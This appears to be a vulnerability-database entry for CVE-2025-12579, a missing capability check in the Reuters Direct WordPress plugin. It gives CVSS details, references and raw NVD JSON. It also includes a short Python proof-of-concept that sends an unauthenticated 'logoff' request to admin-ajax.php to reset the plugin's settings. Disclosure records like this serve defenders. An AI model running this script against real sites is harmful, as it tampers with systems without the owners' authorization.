CVE-2025-12579

Description

The Reuters Direct plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'logoff' action in all versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to reset the plugin's settings.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Reuters Direct plugin for WordPress <= 3.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-12579 PoC - Reuters Direct Plugin Unauthorized Settings Reset
# Target: WordPress site with Reuters Direct plugin <= 3.0.0

target_url = "http://target-wordpress-site.com"

# Construct the malicious request to trigger the 'logoff' action
# This action resets the plugin settings without authentication
payload = {
    'action': 'logoff'
}

try:
    response = requests.post(
        f"{target_url}/wp-admin/admin-ajax.php",
        data=payload,
        timeout=10
    )
    
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    
    if response.status_code == 200:
        print("[+] PoC executed successfully - Plugin settings may have been reset")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12579
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12579
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12579/
[4] VulDB https://vuldb.com/cve/CVE-2025-12579
[5] https://wordpress.org/plugins/reuters-direct/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/4360f293-201c-40c1-9603-931d72cc79bc?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12579", "sourceIdentifier": "[email protected]", "published": "2025-11-27T03:15:57.360", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Reuters Direct plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'logoff' action in all versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to reset the plugin's settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/reuters-direct/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4360f293-201c-40c1-9603-931d72cc79bc?source=cve", "source": "[email protected]"}]}}